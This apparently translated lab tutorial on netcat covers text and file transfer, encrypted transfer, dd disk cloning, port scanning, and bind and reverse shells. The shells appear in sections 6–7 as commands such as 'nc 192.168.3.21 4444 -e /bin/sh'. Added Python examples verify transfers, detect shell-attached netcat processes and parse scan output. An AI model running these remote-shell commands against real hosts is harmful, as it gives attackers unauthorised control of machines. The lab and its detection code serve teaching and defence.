I. Introduction to Netcat
**netcat** is the Swiss Army knife of networking tools: it reads and writes data across the network over TCP and UDP. Combined with other tools and with redirection, it can be used in scripts in many ways, and the range of things the netcat command can accomplish is surprising.
All netcat does is establish a connection between two computers and return two data streams; what you do after that is limited only by your imagination. You can set up a server, transfer files, chat with a friend, stream media, or use it as a standalone client for other protocols.
II. Common Netcat parameters:
OpenBSD netcat (Debian patchlevel 1.218-4ubuntu1)
usage: nc [-46CDdFhklNnrStUuvZz] [-I length] [-i interval] [-M ttl]
[-m minttl] [-O length] [-P proxy_username] [-p source_port]
[-q seconds] [-s sourceaddr] [-T keyword] [-V rtable] [-W recvlimit]
[-w timeout] [-X proxy_protocol] [-x proxy_address[:port]]
[destination] [port]
Command Summary:
-4 Use IPv4
-6 Use IPv6
-b Allow broadcast
-C Send CRLF as line-ending
-D Enable the debug socket option
-d Detach from stdin
-F Pass socket fd
-h This help text
-I length TCP receive buffer length
-i interval Delay interval for lines sent, ports scanned
-k Keep inbound sockets open for multiple connects
-l Listen mode, for inbound connects
-M ttl Outgoing TTL / Hop Limit
-m minttl Minimum incoming TTL / Hop Limit
-N Shutdown the network socket after EOF on stdin
-n Suppress name/port resolutions
-O length TCP send buffer length
-P proxyuser Username for proxy authentication
-p port Specify local port for remote connects
-q secs quit after EOF on stdin and delay of secs
-r Randomize remote ports
-S Enable the TCP MD5 signature option
-s sourceaddr Local source address
-T keyword TOS value
-t Answer TELNET negotiation
-U Use UNIX domain socket
-u UDP mode
-V rtable Specify alternate routing table
-v Verbose
-W recvlimit Terminate after receiving a number of packets
-w timeout Timeout for connects and final net reads
-X proto Proxy protocol: "4", "5" (SOCKS) or "connect"
-x addr[:port] Specify proxy address and port
-Z DCCP mode
-z Zero-I/O mode [used for scanning]
Port numbers can be individual or ranges: lo-hi [inclusive]
III. Lab content
Lab equipment:
Server: Kali-linux-2022
192.168.3.21
Client: Ubuntu 22.04.1 LTS
192.168.3.22
1. Transmitting text messages
nc can pass messages back and forth between two machines. One machine first listens on a port, and the other connects to that port; once the connection is established, the two sides can send messages to each other. The -l option means listen mode, and -p specifies the port.
Server
┌──(root㉿kali)-[/home/kali/Desktop]
└─# nc -lp 1234
hello?
hi?
Client
root@ubuntu-virtual-machine:/# nc -nv 192.168.3.21 1234
Connection to 192.168.3.21 1234 port [tcp/*] succeeded!
hello?
hi?
The link between this kind of message exchange and penetration testing is that it is usable in digital forensics. After a machine has been compromised, a large amount of information and files must be extracted for analysis without disturbing the scene, and nc's mechanism can be used for this. For example, to capture the output of a command, first listen on a port on one machine, then run the command on the compromised machine and pipe its output into nc pointed at the other machine's address and port; the output then arrives at the other end.
2. File transfer
File transfer -> download
On the server, create log.txt under /home/kali/ to receive the file
┌──(root㉿kali)-[/home/kali/Desktop]
└─# nc -lp 1234 > /home/kali/log.txt
The client runs nc
root@ubuntu-virtual-machine:/home/ubuntu/桌面# nc 192.168.3.21 1234 < openme.txt
Go back to the /home/kali/ directory and look at log.txt
┌──(kali㉿kali)-[~]
└─$ cat log.txt
If you see me, the file has been successfully downloaded!
File transfer -> upload
The server sends log.txt
┌──(kali㉿kali)-[~]
└─$ nc -lp 1234 < /home/kali/log.txt
The client receives it
root@ubuntu-virtual-machine:/home/ubuntu/桌面# nc 192.168.3.21 1234 > get.txt
root@ubuntu-virtual-machine:/home/ubuntu/桌面# cat get.txt
If you see me, the file has been successfully downloaded!
As shown, the contents have been written successfully to get.txt on the client.
With Windows as the server and Kali as the client, simply reverse the steps above; no actual run is shown here. If the server is not yet ready for a connection while the client has already started connecting with nc, the client keeps waiting until it reaches the server, which looks like a "hung" state. Solution: set a wait time (the -w timeout).
3. Transferring a directory
Transferring a directory is really the same as transferring text or a file: treat the directory as a file. Pack it into an archive for transfer, and unpack it on the receiving machine; that completes the directory transfer. For example, with the tar command, cvf packs and xvf unpacks: c creates the archive, v shows the detailed progress, f gives the file name, and x extracts.
Server
┌──(kali㉿kali)-[~/Desktop]
└─$ tar cvf - ~/Desktop/ | nc -lp 1234 -q 1
tar: Removing leading `/' from member names
/home/kali/Desktop/
/home/kali/Desktop/class two/
/home/kali/Desktop/heard.txt
/home/kali/Desktop/class one/
/home/kali/Desktop/class one/first.pcapng
/home/kali/Desktop/class one/class_two.pcapng
/home/kali/Desktop/class one/class_one.pcapng
Client
root@ubuntu-virtual-machine:/home/ubuntu/桌面# nc -nv 192.168.3.21 1234 | tar xvf -
Connection to 192.168.3.21 1234 port [tcp/*] succeeded!
home/kali/Desktop/
home/kali/Desktop/class two/
home/kali/Desktop/heard.txt
home/kali/Desktop/class one/
home/kali/Desktop/class one/first.pcapng
home/kali/Desktop/class one/class_two.pcapng
home/kali/Desktop/class one/class_one.pcapng
4. Encrypted file transfer
Encrypted file transfer uses the mcrypt tool, which Linux systems do not install by default, so it must be installed manually. The rest is similar to a plain file transfer: the file is simply encrypted with mcrypt as it is sent.
The options used are: --flush flushes the output immediately, -F writes the data to the output, -b does not keep the algorithm information, -q suppresses some non-critical warnings, and -d decrypts. First listen on a port on the receiving side and wait for the other machine to connect and send the file; then, on the sending machine, encrypt the file and use nc to connect to the specified address and port.
Server
┌──(root㉿kali)-[/home/kali/Desktop]
└─# nc -lp 1234 | mcrypt --flush -Fbqd -a rijndael-256 -m ecb > heard.txt
Enter passphrase:
Client
root@ubuntu-virtual-machine:/home/ubuntu/桌面# mcrypt --flush -Fbq -a rijndael-256 -m ecb < get.txt | nc -nv 192.168.3.21 1234 -q 1
Enter the passphrase (maximum of 512 characters)
Please use a combination of upper and lower case letters and numbers.
Enter passphrase: Connection to 192.168.3.21 1234 port [tcp/*] succeeded!
Enter passphrase:
5. Remote disk cloning
Remote disk cloning is useful in remote forensics and relies on the dd command. First listen on a port with nc, then use dd to name the partition to clone: dd's of parameter names the output it writes to (the "copy" side), while on the other machine nc connects to that port and dd's if parameter names the input it reads from (the "paste" side). The format is as follows:
nc -lp 6666 | dd of=/dev/sda
dd if=/dev/sda | nc -nv 192.168.228.128 6666 -q 1
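The file transfer in section 2 and the disk clone in section 5 both rely on a bare nc stream: nothing tells the receiver how long to wait, and nothing confirms that every byte arrived. As an added example (not code from the original post), the Python below reproduces the `nc -lp PORT > file` / `nc HOST PORT < file` exchange between two threads on localhost and adds the two checks a practitioner wants, a receive timeout in the role of nc's -w option (so the "hung" receiver described in section 2 gives up instead of waiting forever) and an end-to-end SHA-256 comparison (so a truncated or corrupted transfer is noticed). Host, port, timeout and the sample payload are constructed for the example.

```python
"""Added example: netcat-style file transfer with a receive timeout and an
end-to-end SHA-256 check.  Not from the original post; host, port, timeout
and payload are constructed for the demonstration."""
import hashlib
import socket
import threading

HOST = "127.0.0.1"   # stands in for 192.168.3.21 in the page
PORT = 0             # 0 = let the OS pick a free port (the page uses 1234)
TIMEOUT = 5.0        # seconds, same role as `nc -w 5`

# Constructed sample payload: the page's log.txt line, repeated to exceed one TCP segment.
PAYLOAD = b"If you see me, the file has been successfully downloaded!\n" * 2000


def receive_file(listener, timeout=TIMEOUT):
    """Equivalent of `nc -lp PORT > file`: accept one connection and read until EOF.

    The timeout applies both to waiting for a peer and to each read, which is
    what keeps the receiver from hanging when nobody ever connects."""
    listener.settimeout(timeout)
    conn, _ = listener.accept()            # raises socket.timeout if no peer connects
    chunks = []
    with conn:
        conn.settimeout(timeout)
        while True:
            chunk = conn.recv(65536)
            if not chunk:                  # peer closed its side: EOF, like nc after -q/-N
                break
            chunks.append(chunk)
    return b"".join(chunks)


def send_file(host, port, data, timeout=TIMEOUT):
    """Equivalent of `nc HOST PORT < file`: connect, stream the bytes, signal EOF.

    Returns the SHA-256 of what was sent so the receiver's copy can be verified."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(data)
        sock.shutdown(socket.SHUT_WR)      # send EOF; nc needs -q or -N to do this
    return hashlib.sha256(data).hexdigest()


def transfer(data, timeout=TIMEOUT):
    """Run receiver and sender together; return (received_bytes, sender_hash, receiver_hash)."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind((HOST, PORT))
    listener.listen(1)
    port = listener.getsockname()[1]
    result = {}

    def receiver():
        try:
            result["data"] = receive_file(listener, timeout)
        except socket.timeout:
            result["data"] = None

    thread = threading.Thread(target=receiver)
    thread.start()
    sender_hash = send_file(HOST, port, data, timeout)
    thread.join()
    listener.close()
    received = result["data"]
    receiver_hash = hashlib.sha256(received).hexdigest() if received is not None else None
    return received, sender_hash, receiver_hash


def listener_times_out(timeout=0.5):
    """The -w behaviour: with no client connecting, the receiver gives up instead of hanging."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind((HOST, PORT))
    listener.listen(1)
    try:
        receive_file(listener, timeout)
        return False
    except socket.timeout:
        return True
    finally:
        listener.close()


if __name__ == "__main__":
    received, sent_hash, got_hash = transfer(PAYLOAD)
    print("transfer intact:", received == PAYLOAD and sent_hash == got_hash)
    print("listener without a client times out:", listener_times_out())
```

The same check maps directly onto the shell commands on the page: run `sha256sum` on the source file (or on the partition image for the dd case) before sending and on the received file afterwards, and treat a mismatch as a failed transfer rather than assuming nc delivered everything.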
6. Creating a listening / connecting backdoor
Listening backdoor
Server
┌──(root㉿kali)-[/home/kali/Desktop]
└─# ncat -l -e /bin/sh -p 4444
Client
root@ubuntu-virtual-machine:/home/ubuntu/桌面# nc -w 10 192.168.3.21 4444
ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.3.21 netmask 255.255.255.0 broadcast 192.168.3.255
inet6 fe80::8c1d:36a6:b6c7:9d64 prefixlen 64 scopeid 0x20<link>
ether 00:0c:29:fd:52:9c txqueuelen 1000 (Ethernet)
RX packets 172820 bytes 37543859 (35.8 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 189400 bytes 52498244 (50.0 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 144 bytes 7472 (7.2 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 144 bytes 7472 (7.2 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
Connecting backdoor
Server
┌──(root㉿kali)-[/home/kali/Desktop]
└─# nc -ltvp 4444
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 192.168.3.22.
Ncat: Connection from 192.168.3.22:46990.
Client
root@ubuntu-virtual-machine:/home/ubuntu/桌面# nc 192.168.3.21 4444 -e /bin/sh
ifconfig
root@ubuntu-virtual-machine:/home/ubuntu/桌面# ifconfig
ens33: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.3.22 netmask 255.255.255.0 broadcast 192.168.3.255
inet6 fe80::13b7:c830:cef8:924e prefixlen 64 scopeid 0x20<link>
ether 00:0c:29:71:25:8a txqueuelen 1000 (以太网)
RX packets 272375 bytes 159129764 (159.1 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 206658 bytes 16759835 (16.7 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (本地环回)
RX packets 3390 bytes 440132 (440.1 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 3390 bytes 440132 (440.1 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
7. Remote control / forward and reverse shells
Forward shell
Forward shell: netcat in server mode listens for connections and hands a shell process to any client that connects. Netcat running in client mode can then connect to the server, obtain shell access on it, and run commands. From a penetration-testing point of view, the server is the victim machine and the client is the attacker's machine.
Server
┌──(root㉿kali)-[/home/kali/Desktop]
└─# nc -lp 1234 -c bash
Client
root@ubuntu-virtual-machine:/home/ubuntu/桌面# nc 192.168.3.21 1234
ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.3.21 netmask 255.255.255.0 broadcast 192.168.3.255
inet6 fe80::8c1d:36a6:b6c7:9d64 prefixlen 64 scopeid 0x20<link>
ether 00:0c:29:fd:52:9c txqueuelen 1000 (Ethernet)
RX packets 172760 bytes 37538472 (35.7 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 189345 bytes 52492855 (50.0 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 74 bytes 3740 (3.6 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 74 bytes 3740 (3.6 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
Reverse shell
For a reverse shell, netcat in server mode listens for the connection, and the shell is supplied from the client. Once the shell is received, the session on the server can run commands on the client. From a penetration-testing point of view, the server is the attacker's machine and the client is the victim machine.
Server (attacker side)
┌──(root㉿kali)-[/home/kali/Desktop]
└─# nc -lvp 4444
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 192.168.3.22.
Ncat: Connection from 192.168.3.22:59992.
ls
get.txt
hey.txt
home
openme.txt
ifconfig
ens33: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.3.22 netmask 255.255.255.0 broadcast 192.168.3.255
inet6 fe80::13b7:c830:cef8:924e prefixlen 64 scopeid 0x20<link>
ether 00:0c:29:71:25:8a txqueuelen 1000 (以太网)
RX packets 272035 bytes 159047796 (159.0 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 206567 bytes 16752141 (16.7 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (本地环回)
RX packets 3388 bytes 439992 (439.9 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 3388 bytes 439992 (439.9 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
Client (victim side)
root@ubuntu-virtual-machine:/home/ubuntu/桌面# nc 192.168.3.21 4444 -e /bin/sh
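Every backdoor and shell in sections 6 and 7 has the same fingerprint on the host that runs it: an nc/ncat process whose command line attaches a shell with -e or -c, either while listening (-l, a bind shell) or while connecting out (a reverse shell). As an added example (not code from the original post), the Python below classifies process command lines, as `ps -eo pid,user,args` prints them, into bind shell, reverse shell or benign netcat use; a defender can run it over a real `ps` listing to spot the pattern. The `ps` listing, process IDs and users below are constructed and include the page's own commands; the `--exec`/`--sh-exec` long options are ncat's spellings of -e/-c.

```python
"""Added example: flag netcat/ncat processes that attach a shell to a socket
(the bind and reverse shells of sections 6 and 7).  Not from the original
post; the ps listing below is constructed."""
import shlex

# Constructed sample of `ps -eo pid,user,args` output, mixing the page's
# backdoor commands with ordinary netcat use and unrelated processes.
PS_OUTPUT = """\
  PID USER     COMMAND
    1 root     /sbin/init
 1201 www-data /usr/sbin/apache2 -k start
 2310 kali     nc -lp 1234
 2344 root     ncat -l -e /bin/sh -p 4444
 2351 ubuntu   nc 192.168.3.21 4444 -e /bin/sh
 2360 root     nc -lp 1234 -c bash
 2402 kali     tar cvf - /home/kali/Desktop
 2410 ubuntu   nc -nvz 192.168.3.21 70-90
"""

NETCAT_NAMES = {"nc", "ncat", "netcat", "nc.traditional", "nc.openbsd"}
SHELLS = {"sh", "bash", "dash", "zsh", "ksh", "cmd.exe", "powershell.exe"}
EXEC_FLAGS = ("-e", "-c", "--exec", "--sh-exec")


def parse_ps(text):
    """Yield (pid, user, argv) for each process line, skipping the header."""
    for line in text.splitlines()[1:]:
        parts = line.split(None, 2)
        if len(parts) < 3:
            continue
        pid, user, cmd = parts
        try:
            argv = shlex.split(cmd)
        except ValueError:          # unbalanced quotes: fall back to whitespace split
            argv = cmd.split()
        yield int(pid), user, argv


def classify_netcat(argv):
    """Return 'bind-shell', 'reverse-shell' or None for one argv.

    A shell is attached when -e/-c (or --exec/--sh-exec) names a shell binary.
    With -l present the process listens (bind shell); otherwise it connects
    out to the address on its command line (reverse shell)."""
    if not argv or argv[0].rsplit("/", 1)[-1] not in NETCAT_NAMES:
        return None
    listening = False
    exec_target = None
    i = 1
    while i < len(argv):
        arg = argv[i]
        if arg in EXEC_FLAGS and i + 1 < len(argv):
            exec_target = argv[i + 1]
            i += 2
            continue
        if arg.startswith("--exec=") or arg.startswith("--sh-exec="):
            exec_target = arg.split("=", 1)[1]
        elif arg.startswith("-") and not arg.startswith("--") and "l" in arg[1:]:
            listening = True         # covers -l as well as bundled forms like -lp, -lvp, -ltvp
        i += 1
    if exec_target is None:
        return None
    program = exec_target.split()[0].rsplit("/", 1)[-1]   # "/bin/sh" -> "sh", "bash -i" -> "bash"
    if program not in SHELLS:
        return None
    return "bind-shell" if listening else "reverse-shell"


def find_shell_backdoors(ps_text):
    """Return [(pid, user, kind, command)] for every netcat process that attaches a shell."""
    hits = []
    for pid, user, argv in parse_ps(ps_text):
        kind = classify_netcat(argv)
        if kind:
            hits.append((pid, user, kind, " ".join(argv)))
    return hits


if __name__ == "__main__":
    for pid, user, kind, cmd in find_shell_backdoors(PS_OUTPUT):
        print(f"{kind:13s} pid={pid} user={user} cmd={cmd}")
```

Plain `nc -lp 1234` and the `-z` scan are deliberately left unflagged: the signal is the shell attached to the socket, not netcat itself. On a real host the same three hits would also show up as a listening socket owned by nc/ncat (bind shell) or an established outbound connection from nc with a shell as its child process (reverse shell), which is the corroborating evidence to look for before acting on the command line alone.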
8. Port scanning
The nc command for port scanning is nc -nvz <ip address> <port>. The -z option literally means "no I/O" and is used for scanning: it only probes, much like a ping, whether the target has the specified port open, without any further interaction.
-n means accept IP addresses only, with no DNS resolution
-v lists detailed information about what is being done
-z scans TCP by default; to scan UDP, the additional -u option is required
I first started the apache2 service on the client machine
Check the port status on the client with the command netstat -ano
┌──(root㉿kali)-[/home/kali/Desktop]
└─# netstat -ano
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State Timer
tcp6 0 0 :::80 :::* LISTEN off (0.00/0/0)
udp 0 0 192.168.3.21:68 192.168.3.1:67 ESTABLISHED off (0.00/0/0)
raw6 0 0 :::58 :::* 7 off (0.00/0/0)
Active UNIX domain sockets (servers and established)
The apache2 service uses port 80 by default
nc -nvz 192.168.3.21 70-90
root@ubuntu-virtual-machine:/# nc -nvz 192.168.3.21 70-90
nc: connect to 192.168.3.21 port 70 (tcp) failed: Connection refused
nc: connect to 192.168.3.21 port 71 (tcp) failed: Connection refused
nc: connect to 192.168.3.21 port 72 (tcp) failed: Connection refused
nc: connect to 192.168.3.21 port 73 (tcp) failed: Connection refused
nc: connect to 192.168.3.21 port 74 (tcp) failed: Connection refused
nc: connect to 192.168.3.21 port 75 (tcp) failed: Connection refused
nc: connect to 192.168.3.21 port 76 (tcp) failed: Connection refused
nc: connect to 192.168.3.21 port 77 (tcp) failed: Connection refused
nc: connect to 192.168.3.21 port 78 (tcp) failed: Connection refused
nc: connect to 192.168.3.21 port 79 (tcp) failed: Connection refused
Connection to 192.168.3.21 80 port [tcp/*] succeeded!
nc: connect to 192.168.3.21 port 81 (tcp) failed: Connection refused
nc: connect to 192.168.3.21 port 82 (tcp) failed: Connection refused
nc: connect to 192.168.3.21 port 83 (tcp) failed: Connection refused
nc: connect to 192.168.3.21 port 84 (tcp) failed: Connection refused
nc: connect to 192.168.3.21 port 85 (tcp) failed: Connection refused
nc: connect to 192.168.3.21 port 86 (tcp) failed: Connection refused
nc: connect to 192.168.3.21 port 87 (tcp) failed: Connection refused
nc: connect to 192.168.3.21 port 88 (tcp) failed: Connection refused
nc: connect to 192.168.3.21 port 89 (tcp) failed: Connection refused
nc: connect to 192.168.3.21 port 90 (tcp) failed: Connection refused
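The listing above is one line per port, and the only interesting line is the single "succeeded!". As an added example (not code from the original post), the Python below parses `nc -nvz` output of exactly that shape into open and closed ports and compares the open set with the services a host is expected to expose, so that a listener nobody planned for stands out; this is how a defender turns the section's scan into a check rather than a list to read by eye. The scan text is constructed from the page's lines plus two extra ports, and the allow-list of expected services is an assumption for the example. Note that nc prints these messages on stderr, so a real capture needs `2>&1`.

```python
"""Added example: parse `nc -nvz host lo-hi` output into open/closed ports and
report listeners that are not on an allow-list.  Not from the original post;
the scan text and the expected-services table are constructed."""
import re

# Constructed sample of `nc -nvz 192.168.3.21 70-90 2>&1` (nc writes these lines to stderr),
# trimmed to a few ports and extended with two ports outside the page's range.
SAMPLE_SCAN = """\
nc: connect to 192.168.3.21 port 78 (tcp) failed: Connection refused
nc: connect to 192.168.3.21 port 79 (tcp) failed: Connection refused
Connection to 192.168.3.21 80 port [tcp/*] succeeded!
nc: connect to 192.168.3.21 port 81 (tcp) failed: Connection refused
Connection to 192.168.3.21 4444 port [tcp/*] succeeded!
nc: connect to 192.168.3.21 port 4445 (tcp) failed: Connection refused
some unrelated line
"""

# The two line shapes OpenBSD nc prints with -v: one success or one failure per port.
OPEN_RE = re.compile(r"^Connection to (\S+) (\d+) port \[(tcp|udp)/[^\]]*\] succeeded!")
CLOSED_RE = re.compile(r"^nc: connect to (\S+) port (\d+) \((tcp|udp)\) failed: (.+)$")


def parse_nc_scan(text):
    """Split nc -z output into (host, port, proto) tuples for open and closed ports.

    The failure reason is kept per port: "Connection refused" means the host
    answered, whereas a timeout usually means a firewall dropped the probe."""
    result = {"open": set(), "closed": set(), "reasons": {}, "unparsed": []}
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        m = OPEN_RE.match(line)
        if m:
            result["open"].add((m.group(1), int(m.group(2)), m.group(3)))
            continue
        m = CLOSED_RE.match(line)
        if m:
            key = (m.group(1), int(m.group(2)), m.group(3))
            result["closed"].add(key)
            result["reasons"][key] = m.group(4)
            continue
        result["unparsed"].append(line)   # keep anything unrecognised instead of silently dropping it
    return result


def unexpected_listeners(parsed, expected):
    """Open ports absent from the allow-list. `expected` maps host -> {(port, proto), ...}."""
    return sorted(
        entry for entry in parsed["open"]
        if (entry[1], entry[2]) not in expected.get(entry[0], set())
    )


# Assumed allow-list for the lab server: only the apache2 listener on tcp/80 is expected.
EXPECTED = {"192.168.3.21": {(80, "tcp")}}

if __name__ == "__main__":
    parsed = parse_nc_scan(SAMPLE_SCAN)
    print("open:", sorted(parsed["open"]))
    print("closed:", len(parsed["closed"]), "unparsed:", parsed["unparsed"])
    print("unexpected listeners:", unexpected_listeners(parsed, EXPECTED))
```

Fed the page's real 70-90 scan, the parser reports tcp/80 open and twenty refused ports, and with the allow-list above the unexpected set is empty; the constructed tcp/4444 line shows what the output looks like when a listener such as the ones from sections 6 and 7 is present.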
IV. Summary
Netcat is an excellent tool for network-related work; I have found it very useful in penetration testing, and it is truly a rare and valuable network testing tool.